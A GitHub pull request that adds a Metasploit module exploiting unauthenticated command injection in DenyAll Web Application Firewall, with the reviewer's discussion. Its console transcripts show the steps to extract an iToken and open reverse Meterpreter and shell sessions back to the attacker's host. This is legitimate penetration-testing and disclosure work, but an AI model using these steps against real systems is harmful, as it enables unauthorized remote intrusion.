Adding DenyAll Web Application Firewall RCE module #8980

Merged
merged 3 commits into from Sep 22, 2017


mmetince commented Sep 19, 2017

This module exploits the command injection vulnerability of DenyAll Web Application Firewall. An unauthenticated user can execute a terminal command in the context of the web server user.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/linux/http/denyall_waf_exec
  • Set RHOST
  • Set LHOST
  • Run check
  • Verify that you are seeing The target appears to be vulnerable.
  • Run exploit
  • Verify that you are seeing iToken value extraction.
  • Verify that you are getting meterpreter session.
```
msf > use exploit/linux/http/denyall_exec
msf exploit(denyall_exec) >
msf exploit(denyall_exec) > set RHOST 35.176.123.128
RHOST => 35.176.123.128
msf exploit(denyall_exec) > set LHOST 35.12.3.3
LHOST => 35.12.3.3
msf exploit(denyall_exec) > check
[*] 35.176.123.128:3001 The target appears to be vulnerable.
msf exploit(denyall_exec) > exploit

[*] Started reverse TCP handler on 35.12.3.3:4444
[*] Extracting iToken value from unauthenticated accessible endpoint.
[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
[*] Trigerring command injection vulnerability with  iToken value.
[*] Sending stage (40411 bytes) to 35.176.123.128
[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300

meterpreter > pwd
/var/log/denyall/reverseproxy
meterpreter >
```

Here are the advisory and technical details about that vulnerability.
https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/


h00die commented Sep 21, 2017

If I get some time over the weekend (which is likely) I've got my eye on this.

Review comment on documentation/modules/exploit/linux/http/denyall_waf_exec.md (outdated), on the lines:

You just need to follow instruction above URL.
## Verification Steps

h00die Sep 21, 2017 (Contributor)

A successful check of the exploit will look like this:

h00die Sep 21, 2017 (Contributor)

Add the heading of ##Scenarios

Five further review comments on modules/exploits/linux/http/denyall_waf_exec.rb (outdated).
Review comment on the lines:

```
msf > use exploit/linux/http/denyall_exec
msf exploit(denyall_exec) >
msf exploit(denyall_exec) > set RHOST 35.176.123.128
```

h00die Sep 21, 2017 (Contributor)

These look to be public IPs (unverified), you may want to change them to something else like 1.1.1.1 and 2.2.2.2

mmetince Sep 21, 2017 (Contributor)

It was my AWS London instance IP that I used for testing purposes. It's not alive anymore.

h00die approved these changes Sep 22, 2017

h00die self-assigned this Sep 22, 2017

h00die commented Sep 22, 2017

Worked fine for me! I actually deployed 6.2.0.

```
msf > use exploit/linux/http/denyall_waf_exec
msf exploit(denyall_waf_exec) > set rhost 1.1.1.1
rhost => 1.1.1.1
msf exploit(denyall_waf_exec) > set lhost 2.2.2.2
lhost => 2.2.2.2
msf exploit(denyall_waf_exec) > set reverselistenerbindaddress 3.3.3.3
reverselistenerbindaddress => 3.3.3.3
msf exploit(denyall_waf_exec) > set verbose true
verbose => true
msf exploit(denyall_waf_exec) > check
[*] 1.1.1.1:3001 The target appears to be vulnerable.
msf exploit(denyall_waf_exec) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Extracting iToken value
[+] Awesome. iToken value = w12c319e6dfdcabe1af2488c84d07077
[*] Trigerring command injection vulnerability with iToken value.
[*] Sending stage (42231 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:13926) at 2017-09-21 21:22:02 -0400
[*] Sending stage (42231 bytes) to 1.1.1.1
[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:13784) at 2017-09-21 21:22:09 -0400

meterpreter > sysinfo
Computer        : ip-172-31-34-108
OS              : Linux 3.10.0-327.36.1.el7.x86_64 #1 SMP Sun Sep 18 13:04:29 UTC 2016
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.31.34.108 - Meterpreter session 2 closed.  Reason: User exit
```

Switched to a generic shell as well.

```
msf exploit(denyall_waf_exec) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf exploit(denyall_waf_exec) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Extracting iToken value
[+] Awesome. iToken value = w12c319e6dfdcabe1af2488c84d07077
[*] Trigerring command injection vulnerability with iToken value.
[*] Command shell session 3 opened (2.2.2.2:4444 -> 1.1.1.1:14236) at 2017-09-21 21:23:04 -0400
whoami
id

daactrl
uid=998(daactrl) gid=999(denyall) groups=999(denyall)
exit
```
h00die commented Sep 22, 2017

A few minor edits on the docs still left to do and I'll get this landed!

h00die commented Sep 22, 2017

I take it back, landing now.

h00die merged commit 3d543b7 into rapid7:master Sep 22, 2017

1 check failed: continuous-integration/travis-ci/pr (The Travis CI build failed)

h00die added a commit that referenced this pull request Sep 22, 2017

h00die commented Sep 22, 2017

Release Notes

The DenyAll Web Application Firewall Remote Code Execution module has been added to the framework. It targets versions 6.3.0 and 6.2.0.

h00die commented Sep 22, 2017

Thanks for the contribution, it looked pretty good from the start, and thanks for being so responsive!

tdoan-r7 added the rn-exploit label Sep 27, 2017

mmetince referenced this pull request Oct 23, 2017: Add module for Kaltura <= 13.1.0 RCE (CVE-2017-14143) #9114 (Merged)